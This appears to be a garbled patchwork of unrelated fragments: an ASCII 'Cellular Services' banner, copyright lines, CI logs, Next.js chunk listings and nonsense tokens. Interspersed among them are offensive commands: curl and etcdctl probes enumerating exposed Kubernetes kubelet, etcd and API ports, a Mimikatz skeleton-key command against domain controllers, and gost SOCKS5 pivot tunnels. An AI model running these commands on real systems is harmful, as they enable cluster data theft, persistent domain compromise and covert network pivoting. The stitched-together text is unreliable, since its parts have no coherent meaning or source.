____ _ _ _ ____ _
/ ___|___| | |_ _| | __ _ _ __ / ___| ___ _ ____ _(_) ___ ___ ___
| | / _ \ | | | | | |/ _` | '__| \___ \ / _ \ '__\ \ / / |/ __/ _ \/ __|
| |__| __/ | | |_| | | (_| | | ___) | __/ | \ V /| | (_| __/\__ \
\____\___|_|_|\__,_|_|\__,_|_| |____/ \___|_| \_/ |_|\___\___||___/
- (c) 2019 kazuya kawaguchi
- (c) 2024 Zaxkeroth
- (c) 2005, 2007 Bob Ippolito. All Rights Reserved.
- (c) The Closure Library Authors.
import os
import sys
import m= b, tp, r:436 # bloat_code
$vendors-node-modules_-ba0e4d5b3207.js:15
$ls
$cd
$forced reflow
[DOM] exceptions (in promise)
8:30, crash
2023-03-25T21:14:25.1705153Z ##[section]Starting: Prepare job test
2023-03-25T21:14:25.1707846Z Evaluating strategy
2023-03-25T21:14:25.1712696Z Creating job '__default'
2023-03-25T21:14:25.1715118Z Evaluating timeout
2023-03-25T21:14:25.1715190Z Evaluating cancel timeout
2023-03-25T21:14:25.1715228Z Evaluating continue on error
2023-03-25T21:14:25.1715272Z Evaluating target
2023-03-25T21:14:25.1717082Z ##[section]Finishing: Prepare job test
*弃用*
/_next/static/chunks/pages/%5BversionId%5D/%5BproductId%5D/%5B...restPage%5D-0a388d0202310049.js119B
/_next/static/xR23a7L8uutSe_4ww_xRn/_buildManifest.js76B
/_next/static/xR23a7L8uutSe_4ww_xRn/_ssgManifest.js74B
/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js73B
/_next/static/chunks/856-9ad78b8d852d1279.js67B
/_next/static/chunks/335-c28a1896766e22f6.js67B
/_next/static/chunks/377-db71c9ecf498e436.js67B
/_next/static/chunks/833-c07ccb17b9c4f763.js67B
/_next/static/chunks/584-0d3303dbd89ed456.js67B
/_next/static/chunks/200-76f833ab3eb14f10.js67B
[POST]
[VERIFICATION]
~
$ _.ksend
this loop # china llc
[VIOLATION]
*这。无尽的。环形*
- Failed to construct clipboard
+ Blocked D e V Tool Request
[!] JWt API XPLOIT
[!] JSON WEB token leakage
(External network visibility)
curl -k https://<IP Address>:4194
curl -k https://<IP Address>:8080
curl -k https://<IP Address>:(8|6)443/swaggerapi
curl -k https://<IP Address>:(8|6)443/healthz
curl -k https://<IP Address>:(8|6)443/api/v1
curl -k https://<IP address>:2379
curl -k https://<IP address>:2379/version
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
curl -k https://<IP address>:10250
curl -k https://<IP address>:10250/metrics
curl -k https://<IP address>:10250/pods
curl -k https://<IP Address>:10255
http://<external-IP>:10255/pods
prompt | -para |
---|---|
specif | -user |
psswrd | -con |
remote | -host |
AWS_SOCIALIST_MEDIUMS_PUPPETEERING
# Exploitation Command runned as DA:
>Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DCs FQDN>
# Access using the password "mimikatz"
[Enter]
$-PSSes
> Server side: gost -L=socks5://:1080
> Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true
[tpl, cName: Z4](https://www.theprodigyleague.github.io)
[subdomain](http://www.assetproductions.net)